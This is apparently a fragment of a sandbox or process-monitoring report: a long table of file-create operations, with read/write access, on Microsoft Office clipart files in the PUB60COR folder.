| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CARBN_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CG1606.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLASSIC1.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLASSIC2.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLIP.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CMNTY_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CRANE.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CRANINST.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CUP.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CUPINST.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00117_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00121_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00234_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00255_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00256_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00261_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00297_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00372_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00405_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00407_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00413_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00414_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00419_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00437_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00448_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00449_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00687_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00705_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01015_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01039_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01138_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01139_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01140_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01143_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01145_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01146_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01151_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01152_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01157_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01160_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01162_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01163_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01166_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01167_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01168_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01169_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01170_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01171_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01172_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01173_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01176_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01178_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01179_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01180_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01182_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01183_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01186_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01366_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01434_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01585_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01586_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01628_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01629_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01630_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01631_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01761_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01772_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01793_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EAST_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00010_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00019_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00172_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00184_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00006_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00202_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00222_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00242_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00319_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00320_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00397_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00902_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EXPLR_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FALL_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00074_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00076_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00077_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00086_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00090_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00096_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00296_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00297_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00306_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00336_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00361_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00369_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00382_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00397_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00403_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00414_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00419_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00428_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00435_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00438_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00455_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00459_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00543_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00544_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00564_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00586_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00775_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00779_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00799_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00814_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00965_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01074_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01084_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01176_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01191_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01193_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01196_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01548_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01657_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01658_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01659_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01660_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02068_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02071_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02075_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02088_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02097_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02115_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02116_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02141_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02153_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02158_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02161_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FINCL_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FINCL_02.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FLAP.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\GRDEN_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00057_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00084_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00231_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00235_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00236_.WMF | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
